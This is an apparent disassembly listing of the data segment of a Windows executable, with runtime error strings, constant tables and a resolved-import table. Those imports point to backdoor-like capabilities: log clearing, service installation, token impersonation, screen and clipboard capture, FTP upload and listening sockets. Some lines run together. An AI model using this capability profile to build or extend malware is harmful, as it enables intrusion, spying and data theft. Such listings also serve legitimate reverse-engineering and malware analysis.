dd offset aUnknownError ; "Unknown error"
dd offset aResourceDeadlo ; "Resource deadlock avoided"
dd offset aUnknownError ; "Unknown error"
dd offset aFilenameTooLon ; "Filename too long"
dd offset aNoLocksAvailab ; "No locks available"
dd offset aFunctionNotImp ; "Function not implemented"
dd offset aDirectoryNotEm ; "Directory not empty"
dd offset aIllegalByteSeq ; "Illegal byte sequence"
dd offset aUnknownError ; "Unknown error"
dword_453994 dd 2Bh ; sub_42BEF9:loc_42BF51�r
byte_453998 db 1 ; DATA XREF: sub_4326C8+ED�r
db 2, 4, 8
align 10h
dword_4539A0 dd 3A4h dword_4539A4 dd 82798260h, 21h, 0dword_4539B0 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_453A90 dd 2 ; sub_4330A0+E�o ...
off_453A94 dd offset aR6002FloatingP ; DATA XREF: sub_4330A0+FC�r
; sub_4330A0+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 437CD4h, 9, 437CA8h, 0Ah, 437C84h, 10h, 437C58h
dd 11h, 437C28h, 12h, 437C04h, 13h, 437BD8h, 18h, 437BA0h
dd 19h, 437B78h, 1Ah, 437B40h, 1Bh, 437B08h, 1Ch, 437AE0h
dd 78h, 437AD0h, 79h, 437AC0h, 7Ah, 437AB0h, 0FCh, 4476D0h
dd 0FFh, 437AA0h
dword_453B20 dd 2694h ; sub_42FC1C+46�r ...
dword_453B24 dd 7080h ; sub_4339B6+75�w ...
dword_453B28 dd 1 ; sub_4339B6+A2�w ...
dword_453B2C dd 0FFFFF1F0h ; sub_4339B6+AB�w ...
off_453B30 dd offset dword_545350 ; DATA XREF: .text:off_453BB0�o
dd 0Fh dup(0)
off_453B70 dd offset dword_544450 ; DATA XREF: .text:off_453BB4�o
dd 0Fh dup(0)
off_453BB0 dd offset off_453B30 ; DATA XREF: sub_4339B6+D0�r
; sub_4339B6+EF�r ...
off_453BB4 dd offset off_453B70 ; DATA XREF: sub_4339B6+109�r
; sub_4339B6+130�r ...
dword_453BB8 dd 0FFFFFFFFh ; sub_433C5E+1E�r ...
dword_453BBC dd 0 ; sub_433E0A+BF�w
dword_453BC0 dd 0 ; sub_433E0A+E0�w
align 8
dword_453BC8 dd 0FFFFFFFFh ; sub_433C5E+26�r ...
dword_453BCC dd 0 ; sub_433E0A+EA�w ...
dword_453BD0 dd 0 ; sub_433E0A+23�r ...
dword_453BD4 dd 0FFFFFFFFh dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_453C04 dd 16Dh ; sub_433E0A+2E�r ...
dword_453C08 dd 0FFFFFFFFh dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
dword_453C40 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_453C58 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 2, 453C78h, 437F14h
; DATA XREF: sub_4344AC�o
dd 437F10h, 437F0Ch, 437F08h, 437F04h, 437F00h, 437EFCh
dd 437EF4h, 437EECh, 437EE4h, 437ED8h, 437ECCh, 437EC4h
dd 437EB8h, 437EB4h, 437EB0h, 437EACh, 437EA8h, 437EA4h
dd 437EA0h, 437E9Ch, 437E98h, 437E94h, 437E90h, 437E8Ch
dd 437E88h, 437E80h, 437E74h, 437E6Ch, 437E64h, 437EA4h
dd 437E5Ch, 437E54h, 437E4Ch, 437E40h, 437E38h, 437E2Ch
dd 437E20h, 450C4Ch, 450C50h, 437E18h, 437E04h, 437DFCh
dd 0
dword_453D28 dd 2Eh, 0 dd offset dword_453D28
dd offset dword_676C70
dd offset dword_676C70
dd offset dword_676C70
dd offset dword_676C70
dd offset dword_676C70
dd offset dword_676C70
dd offset dword_676C70
dd offset dword_676C70
dd offset dword_676C70
dd 2 dup(7F7F7F7Fh), 453D30h, 3 dup(0)
dword_453D70 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_453ED0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_436254+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dword_454030 dd 2 dup(0) word_454038 dw 0 ; DATA XREF: sub_401136+13�o
; sub_408029+2F�r ...
align 10h
dword_454040 dd 0 ; sub_402BD7+9�w
dword_454044 dd 0 ; sub_402BD7+21�r
dword_454048 dd 0 ; sub_402BD7+2E�r
dd 23h dup(0)
dword_4540D8 dd 0 ; sub_40222C+B1�w ...
dword_4540DC dd 0 ; sub_402459+19A�r ...
dd 198h dup(0)
dword_454740 dd 3 dup(0) dword_45474C dd 6 dup(0) ; sub_402459+201�o ...
dword_454764 dd 3 dup(0) dword_454770 dd 0 dword_454774 dd 41h dup(0) dword_454878 dd 41h dup(0) dword_45497C dd 0 ; sub_4020BA+FE�r
dword_454980 dd 0 dword_454984 dd 0 ; sub_4020BA+BE�r
dword_454988 dd 23h dup(0) dword_454A14 dd 0 ; sub_4020BA:loc_4021D9�r
dword_454A18 dd 0 dword_454A1C dd 0 ; sub_402CE9+8F�r ...
dword_454A20 dd 4 dup(0) dword_454A30 dd 0 ; sub_402CE9+58�w ...
dword_454A34 dd 0 ; resolved to->NTDLL.RtlInitUnicodeString ; sub_402822+35�r ...
dword_454A38 dd 0 ; resolved to->NTDLL.ZwOpenSection ; sub_40292F+62�r ...
dword_454A3C dd 0 ; sub_402822+2D�r ...
dword_454A40 dd 0 ; sub_402A0E�r ...
dword_454A44 dd 0 ; sub_40292F+7F�r ...
dword_454A48 dd 0 ; sub_40A9FE+5F2B�w ...
dword_454A4C dd 0 ; sub_40A9FE+2231�w ...
dword_454A50 dd 0 ; sub_402CE9:loc_40318E�r ...
byte_454A54 db 0 ; DATA XREF: sub_401E9E+37�r
; sub_40541D+8E�o ...
align 4
dword_454A58 dd 20h dup(0) ; sub_40366B+14�o
dword_454AD8 dd 0 ; sub_4066E2+43�w
align 10h
dword_454AE0 dd 6 dup(0) ; sub_4066E2+314�o ...
dword_454AF8 dd 0 ; sub_4066E2+3C9�o
dword_454AFC dd 0 ; sub_4066E2+3D5�o
dword_454B00 dd 0 ; sub_4066E2+3E6�o
dword_454B04 dd 0 ; sub_4066E2+3F5�o
dword_454B08 dd 0 ; sub_4066E2+401�o
dword_454B0C dd 0 ; sub_4066E2+411�o
dword_454B10 dd 0 ; sub_4066E2+41D�o
dword_454B14 dd 0 ; sub_4066E2+42D�o
dword_454B18 dd 0B2h dup(0) ; sub_4066E2+441�o
dword_454DE0 dd 0 dword_454DE4 dd 0 dword_454DE8 dd 0 dword_454DEC dd 0 dword_454DF0 dd 0 dword_454DF4 dd 0 dword_454DF8 dd 53h dup(0) dword_454F44 dd 0 dword_454F48 dd 0 dword_454F4C dd 0 dword_454F50 dd 0 dword_454F54 dd 0 dword_454F58 dd 0 dword_454F5C dd 0 dword_454F60 dd 0 ; sub_406429+EB�r ...
align 8
dword_454F68 dd 96h dup(0) ; sub_4066E2+289�o ...
dword_4551C0 dd 3 dup(0) dword_4551CC dd 3 dup(0) dword_4551D8 dd 9 dup(0) dword_4551FC dd 3 dup(0) dword_455208 dd 9 dup(0) dword_45522C dd 49h dup(0) dword_455350 dd 10h dup(0) dword_455390 dd 0 dword_455394 dd 0 ; sub_405C99+439�o
dword_455398 dd 0 ; sub_4066E2+514�r ...
dword_45539C dd 0 ; sub_4066E2+50A�r
dword_4553A0 dd 0 ; sub_4066E2:loc_406BC7�r
dword_4553A4 dd 2 dup(0) ; sub_4066E2+22C�o ...
dword_4553AC dd 0 dword_4553B0 dd 0 dword_4553B4 dd 41h dup(0) dword_4554B8 dd 41h dup(0) dword_4555BC dd 0 ; sub_406C69+EA�r
dword_4555C0 dd 0 dword_4555C4 dd 0 ; sub_406C69+56�w ...
dword_4555C8 dd 23h dup(0) dword_455654 dd 0 ; sub_406C69:loc_406D74�r
dword_455658 dd 0 dd 19h dup(0)
dword_4556C0 dd 0 ; .text:00408B71�w ...
align 8
byte_4556C8 db 0 ; DATA XREF: .text:0040825E�o
; .text:004087B3�r ...
align 4
dd 3Fh dup(0)
dword_4557C8 dd 3 dup(0) dword_4557D4 dd 0 ; sub_409EE2+C0�r
dword_4557D8 dd 0 align 10h
dword_4557E0 dd 0 align 8
byte_4557E8 db 0 ; DATA XREF: sub_409EE2+BA�o
; sub_409FC8+63�o
byte_4557E9 db 3 dup(0) ; DATA XREF: sub_409FC8+74�o
dd 1FEh dup(0)
db 2 dup(0)
word_455FE6 dw 0 ; DATA XREF: sub_409FC8+CF�o
dd 8Ah dup(0)
dword_456210 dd 0 ; sub_40A7C5:loc_40A90B�w
align 8
dword_456218 dd 4 dup(0) dword_456228 dd 0 dword_45622C dd 41h dup(0) dword_456330 dd 41h dup(0) dword_456434 dd 0 ; sub_40A9FE+226C�r ...
dword_456438 dd 0 dword_45643C dd 0 ; sub_40A9FE+21BD�w ...
dword_456440 dd 23h dup(0) dword_4564CC dd 0 ; sub_40A9FE:loc_40CC8E�r
dword_4564D0 dd 0 align 8
dword_4564D8 dd 0 ; sub_40A9FE+672C�o
dd 20h dup(0)
dword_45655C dd 0 ; sub_40A9FE+673E�r
dd 0Ah dup(0)
dword_456588 dd 0 dword_45658C dd 0 dd 0
dword_456594 dd 0 ; sub_40A9FE:loc_4111A7�r
align 10h
dword_4565A0 dd 80h dup(0) ; sub_401B6E+265�o ...
dword_4567A0 dd 0 ; sub_401B6E+259�r ...
align 8
dword_4567A8 dd 80h dup(0) ; sub_406429+1DF�o ...
dword_4569A8 dd 80h dup(0) ; sub_406429+1DA�o ...
dword_456BA8 dd 80h dup(0) ; sub_406429:loc_4065BD�o ...
dword_456DA8 dd 0 ; sub_401B6E+81�w ...
dword_456DAC dd 0 ; resolved to->GDI32.DeleteDC ; sub_417362+66F�r
dword_456DB0 dd 0 ; resolved to->KERNEL32.Module32Firstdword_456DB4 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_417362+9A0�w ...
dword_456DB8 dd 0 ; sub_417362+BE5�r
dword_456DBC dd 0 ; sub_417362+BB5�r ...
dword_456DC0 dd 0 ; resolved to->GDI32.SelectObject ; sub_417362+65F�r
dword_456DC4 dd 0 ; sub_417362+BDD�r
dword_456DC8 dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_417362+404�w ...
dword_456DCC dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_41BE01+177�r
dword_456DD0 dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_4051EF+12B�r ...
dword_456DD4 dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_417362+4FE�r
dword_456DD8 dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_402CE9+162�r ...
dword_456DDC dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_417362+DF�r
dword_456DE0 dd 0 ; sub_417362+BA8�r ...
dword_456DE4 dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4051EF:loc_4052EA�r ...
dword_456DE8 dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_417362+A5B�r ...
dword_456DEC dd 0 ; resolved to->USER32.GetWindowThreadProcessId ; sub_417362+277�r
dword_456DF0 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_417362+359�r ...
dword_456DF4 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_417362+A53�r ...
dword_456DF8 dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_417362+107�r
dword_456DFC dd 0 ; resolved to->WININET.InternetReadFile ; sub_417362+A63�r ...
dword_456E00 dd 0 ; resolved to->ADVAPI32.LockServiceDatabase ; sub_417362+50E�r ...
dword_456E04 dd 0 ; resolved to->ADVAPI32.RegEnumValueA ; sub_417362+379�r ...
dword_456E08 dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_417362+861�r
dword_456E0C dd 0 ; resolved to->KERNEL32.Process32Next ; sub_417362+D7�r
dword_456E10 dd 0 ; resolved to->IPHLPAPI.IcmpSendEchodword_456E14 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_417362+C33�w ...
dword_456E18 dd 0 ; resolved to->WININET.FtpGetFileAdword_456E1C dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_417362+FF�r
dword_456E20 dd 0 ; sub_417362+EAF�r ...
dword_456E24 dd 0 ; resolved to->GDI32.GetDIBColorTable ; sub_417362+657�r
dword_456E28 dd 0 ; resolved to->WS2_32.ntohl ; sub_407281+F6�r ...
dword_456E2C dd 0 ; sub_417362+B6D�w ...
dword_456E30 dd 0 ; resolved to->WS2_32.ntohs ; sub_417362+8E5�r ...
dword_456E34 dd 0 ; sub_417362+D4C�w
dword_456E38 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_417362+A1C�r ...
dword_456E3C dd 0 ; resolved to->USER32.ExitWindowsExdword_456E40 dd 0 ; sub_417362+BBD�r ...
dword_456E44 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_417362+4DE�r ...
dword_456E48 dd 0 ; resolved to->ADVAPI32.OpenThreadToken ; sub_417362+3BE�r ...
dword_456E4C dd 0 ; resolved to->ADVAPI32.CloseEventLog ; sub_417362+587�w ...
dword_456E50 dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_4051EF+136�r ...
dword_456E54 dd 0 ; resolved to->WS2_32.getpeernamedword_456E58 dd 0 ; resolved to->WS2_32.WSACleanup ; sub_417362+705�w ...
dword_456E5C dd 0 ; resolved to->GDI32.DeleteObjectdword_456E60 dd 0 ; sub_417362+B94�w ...
dword_456E64 dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_417362+361�r ...
dword_456E68 dd 0 ; resolved to->ADVAPI32.RegEnumKeyExA ; sub_420F6C+8A�r ...
dword_456E6C dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_417362+E7�r
dword_456E70 dd 0 ; resolved to->ADVAPI32.SetServiceStatus ; sub_422009+12A�r ...
dword_456E74 dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_417362+D99�w ...
dword_456E78 dd 0 ; resolved to->WS2_32.WSAStartup ; sub_417362+844�r ...
dword_456E7C dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_417362+A3F�r ...
dword_456E80 dd 0 ; resolved to->USER32.CloseWindow ; sub_417362+1C6�r
dword_456E84 dd 0 ; sub_417362+B53�w ...
dword_456E88 dd 0 ; resolved to->ADVAPI32.QueryServiceLockStatusA ; sub_417362+516�r ...
dword_456E8C dd 0 ; sub_417362+E3B�r
dword_456E90 dd 0 ; resolved to->ADVAPI32.OpenEventLogA ; sub_417362+57A�w ...
dword_456E94 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_417362+ADD�r
dword_456E98 dd 0 ; resolved to->ADVAPI32.RegDeleteKeyA ; sub_417362+369�r ...
dword_456E9C dd 0 dword_456EA0 dd 0 ; resolved to->ADVAPI32.ClearEventLogA ; sub_417362+56D�w ...
dword_456EA4 dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_417362+879�r
dword_456EA8 dd 0 ; resolved to->WININET.InternetOpenA ; sub_417362+A22�r
dword_456EAC dd 0 ; resolved to->SHLWAPI.PathRemoveFileSpecA ; sub_4182BA+305�r ...
dword_456EB0 dd 0 ; resolved to->USER32.IsWindow ; sub_417362+1E3�r
dword_456EB4 dd 0 ; resolved to->IPHLPAPI.GetNetworkParamsdword_456EB8 dd 0 ; resolved to->WS2_32.getsockname ; sub_40A9FE+9997�r ...
dword_456EBC dd 0 ; resolved to->WS2_32.connect ; sub_401B6E+76�r ...
dword_456EC0 dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_417362+86D�r ...
dword_456EC4 dd 0 ; resolved to->ADVAPI32.RegQueryInfoKeyA ; sub_421126+7A�r
dword_456EC8 dd 0 ; resolved to->USER32.GetWindowInfo ; sub_417362+26F�r
dword_456ECC dd 0 ; resolved to->USER32.ShowWindow ; sub_417362+27F�r
dword_456ED0 dd 0 ; sub_417362:loc_417E0A�w ...
dword_456ED4 dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_417362+349�r ...
dword_456ED8 dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_417362+823�w ...
dword_456EDC dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_417362+3D3�r ...
dword_456EE0 dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_417362+4F6�r ...
dword_456EE4 dd 0 ; sub_41FC58+B5�r ...
dword_456EE8 dd 0 ; sub_417362+E33�r
dword_456EEC dd 0 ; sub_417362+EBC�r ...
dword_456EF0 dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_417362+A37�r ...
dword_456EF4 dd 0 ; resolved to->USER32.OpenClipboard ; sub_417362+1F3�r
dword_456EF8 dd 0 ; resolved to->USER32.IsWindowVisible ; sub_417362+287�r
dword_456EFC dd 0 ; resolved to->IPHLPAPI.GetIfTable ; sub_417362+CC4�r ...
dword_456F00 dd 0 ; resolved to->WININET.InternetConnectA ; sub_417362+A47�r ...
dword_456F04 dd 0 ; resolved to->WSOCK32.recvfrom ; sub_417362+7A8�w ...
dword_456F08 dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_417362+371�r ...
dword_456F0C dd 0 ; sub_423C7A+8C�r
dword_456F10 dd 0 ; resolved to->WSOCK32.setsockopt ; sub_40A17E+34�r ...
dword_456F14 dd 0 ; resolved to->IPHLPAPI.GetTcpTable ; sub_417362+CD0�r
dword_456F18 dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_417362+3CB�r ...
dword_456F1C dd 0 ; resolved to->WS2_32.select ; sub_4022E7+B6�r ...
dword_456F20 dd 0 ; resolved to->GDI32.CreateDCA ; sub_417362+632�r
dword_456F24 dd 0 ; resolved to->USER32.GetClipboardData ; sub_417362+1FB�r
dword_456F28 dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_417362+3F7�w ...
dword_456F2C dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_456F30 dd 0 ; sub_417362+EC4�r ...
dword_456F34 dd 0 ; resolved to->WS2_32.ntohl ; sub_4021E4+2B�r ...
dword_456F38 dd 0 ; resolved to->WS2_32.ntohs ; sub_401B6E+50�r ...
dword_456F3C dd 0 ; resolved to->KERNEL32.Process32First ; sub_417362+CF�r
dword_456F40 dd 0 ; resolved to->GDI32.GetDeviceCaps ; sub_417362+64F�r
dword_456F44 dd 0 ; resolved to->USER32.FindWindowA ; sub_417362+17E�w ...
dword_456F48 dd 0 dword_456F4C dd 0 ; resolved to->WS2_32.gethostname ; sub_417362+93D�r ...
dword_456F50 dd 0 ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerA ; sub_417362+52E�r ...
dword_456F54 dd 0 ; resolved to->ADVAPI32.UnlockServiceDatabase ; sub_417362+526�r ...
dword_456F58 dd 0 ; resolved to->WSOCK32.recv ; sub_401B6E+EE�r ...
dword_456F5C dd 0 ; sub_417362+E43�r
dword_456F60 dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_417362+C7�r
dword_456F64 dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_417362+351�r ...
dword_456F68 dd 0 ; resolved to->WS2_32.listen ; sub_40A17E+5D�r ...
dword_456F6C dd 0 ; resolved to->WS2_32.bind ; sub_40A17E+47�r ...
dword_456F70 dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_4182BA+10C�r ...
dword_456F74 dd 0 dword_456F78 dd 0 ; sub_417362+E1E�r
dword_456F7C dd 0 ; resolved to->WS2_32.inet_addr ; sub_401B6E+40�r ...
dword_456F80 dd 0 ; resolved to->GDI32.CreateDIBSection ; sub_417362+63F�r
dword_456F84 dd 0 ; resolved to->GDI32.BitBlt ; sub_417362+667�r
dword_456F88 dd 0 ; resolved to->GDI32.CreateCompatibleDC ; sub_417362+647�r
dword_456F8C dd 0 ; resolved to->WS2_32.send ; sub_401642+35�r ...
dword_456F90 dd 0 ; resolved to->KERNEL32.GetComputerNameA ; sub_41BE01+188�r ...
dword_456F94 dd 0 ; resolved to->USER32.CloseClipboard ; sub_417362+203�r
dword_456F98 dd 0 ; sub_417362+BF5�r
dword_456F9C dd 0 ; resolved to->USER32.SendMessageA ; sub_40A9FE+2517�r ...
dword_456FA0 dd 0 ; sub_41FC58+E1�r
dword_456FA4 dd 0 ; resolved to->IPHLPAPI.GetUdpTabledword_456FA8 dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_417362+EF�r
dword_456FAC dd 0 ; resolved to->WS2_32.sendto ; .text:0040A490�r ...
dword_456FB0 dd 0 ; sub_4059BF+93�r ...
dword_456FB4 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_41FE3F+80�r ...
dword_456FB8 dd 0 ; resolved to->ADVAPI32.CreateServiceA ; sub_417362+45F�w ...
dword_456FBC dd 0 ; resolved to->WININET.FtpPutFileAdword_456FC0 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_417362+33C�r ...
dword_456FC4 dd 0 ; resolved to->SHELL32.SHChangeNotifydword_456FC8 dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_417362+CBC�r ...
dword_456FCC dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_417362+CAF�r ...
dword_456FD0 dd 0 ; resolved to->WS2_32.socket ; sub_401B6E+5E�r ...
dword_456FD4 dd 0 ; resolved to->WS2_32.gethostbyname ; sub_417362+816�w ...
dword_456FD8 dd 0 ; sub_417362+E2B�r
dword_456FDC dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_4022E7+14�r ...
dword_456FE0 dd 0 ; sub_4059BF+15E�r ...
dword_456FE4 dd 0 ; resolved to->WS2_32.accept ; sub_417362+7E2�w ...
dword_456FE8 dd 0 ; resolved to->WS2_32.shutdown ; sub_41CA82+22�r
dword_456FEC dd 0 ; resolved to->USER32.EnumWindows ; sub_417362+262�r ...
dword_456FF0 dd 0 ; resolved to->WS2_32.closesocket ; sub_401B6E+322�r ...
dword_456FF4 dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_4023BC+4C�r ...
dword_456FF8 dd 0 ; sub_417362+D53�r
dword_456FFC dd 0 ; resolved to->WS2_32.WSASocketA ; sub_417362+855�r
dword_457000 dd 0 ; sub_4059BF+7F�r ...
dword_457004 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_4079AA+4B�r ...
dword_457008 dd 0 ; resolved to->USER32.DestroyWindow ; sub_417362+1EB�r
dword_45700C dd 0 ; resolved to->ADVAPI32.ImpersonateLoggedOnUser ; sub_417362+506�r ...
dword_457010 dd 0 ; resolved to->ADVAPI32.ChangeServiceConfig2A ; sub_417362+51E�r ...
dword_457014 dd 0 ; resolved to->USER32.GetClassNameAdword_457018 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_417362+AEA�r
dword_45701C dd 0 ; resolved to->ADVAPI32.StartServiceCtrlDispatcherA ; sub_418E0F+174�r
dword_457020 dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_417362+F7�r ...
dword_457024 dd 0 ; sub_417362+137�w
dword_457028 dd 0 dword_45702C dd 0 ; sub_417362:loc_417602�w
dword_457030 dd 0 dword_457034 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_40A9FE+1ADF�r ...
dd 0
dword_45703C dd 0 dword_457040 dd 0 dword_457044 dd 0 dword_457048 dd 0 dword_45704C dd 0 dword_457050 dd 0 ; sub_417362:loc_417DD1�w ...
dword_457054 dd 0 dword_457058 dd 0 dword_45705C dd 0 dword_457060 dd 0 dword_457064 dd 0 dword_457068 dd 0 dword_45706C dd 0 dword_457070 dd 0 ; sub_417362:loc_418062�w ...
align 8
dword_457078 dd 0 dword_45707C dd 0 dword_457080 dd 0 dword_457084 dd 0 dword_457088 dd 0 dword_45708C dd 0 dword_457090 dd 0 dd 2 dup(0)
dword_45709C dd 0 ; sub_417362+EE6�w
dword_4570A0 dd 0 dword_4570A4 dd 0 ; sub_423846:loc_4238BE�r
dword_4570A8 dd 0 dd 2 dup(0)
dword_4570B4 dd 0 dword_4570B8 dd 0 align 10h
dword_4570C0 dd 0 ; sub_418D90+A�o ...
dd 5 dup(0)
dword_4570D8 dd 0 ; sub_418D90+5F�r
dd 2D9h dup(0)
dword_457C40 dd 4 dup(0) ; sub_4022E7+C�o ...
dword_457C50 dd 0 align 8
dword_457C58 dd 28h dup(0) ; sub_40A9FE:loc_4132DF�o ...
dword_457CF8 dd 4 dup(0) ; sub_4022E7+2B�o ...
dword_457D08 dd 0 ; sub_402CE9+46C�w
dword_457D0C dd 0 ; sub_418FA1+5A3�w ...
dword_457D10 dd 0 align 8
dword_457D18 dd 41h dup(0) ; sub_42245D+60�o
dword_457E1C dd 0Fh dup(0) dword_457E58 dd 0 ; sub_40A9FE+1952�r ...
align 10h
dword_457E60 dd 40h dup(0) dword_457F60 dd 0 ; sub_40A9FE+89FA�r ...
dword_457F64 dd 0 ; sub_418FA1+663�r ...
dword_457F68 dd 0 ; sub_406C69+24�r ...
byte_457F6C db 0 ; DATA XREF: sub_416596+D9�o
; sub_420CB6+50�o
byte_457F6D db 3 dup(0) ; DATA XREF: sub_416596+F1�o
; sub_420D29+23�o
dword_457F70 dd 0Dh dup(0) dword_457FA4 dd 0Dh dup(0) dword_457FD8 dd 0 ; sub_41BC0B:loc_41BC81�r ...
dword_457FDC dd 107h dup(0) dword_4583F8 dd 4 dup(0) dword_458408 dd 4 dup(0) byte_458418 db 0 ; DATA XREF: sub_41D2AB+B�o
; sub_41D2AB+5A�w
align 4
dd 3 dup(0)
dword_458428 dd 4 dup(0) dword_458438 dd 4 dup(0) dword_458448 dd 0 byte_45844C db 0 ; DATA XREF: sub_41D242+A�o
; sub_41D242+2B�r
align 10h
dd 3 dup(0)
dword_45845C dd 4 dup(0) byte_45846C db 0 ; DATA XREF: sub_41D1FD+5�o
; sub_41D1FD+2C�w ...
